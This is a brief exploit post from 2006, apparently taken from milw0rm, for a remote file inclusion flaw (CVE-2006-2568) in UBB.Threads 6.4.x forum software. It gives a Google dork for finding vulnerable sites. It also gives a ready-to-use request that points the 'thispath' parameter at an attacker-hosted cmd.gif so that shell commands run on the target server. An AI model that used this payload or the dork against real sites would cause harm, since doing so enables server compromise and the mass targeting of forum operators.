UBBCentral UBB.Threads 6.4.x < 6.5.2 - 'thispath' Remote File Inclusion

Related Vulnerabilities: CVE-2006-2568  
Publish Date: 22 May 2006
Author: V4mu
                Anomaly 1n The System presents
UBB.threads &gt;= 6.4.x Remote File Inclusion
 
founded by V4mu in 04/20/2006

URL: http://www.ubbcentral.com
Google dork: allinurl:"/ubbthreads/"

exploit:
/addpost_newpoll.php?addpoll=preview&amp;thispath=http://[attacker]/cmd.gif?&amp;cmd=id
 
contact: irc.gigachat.net #A1TS

# milw0rm.com [2006-05-22]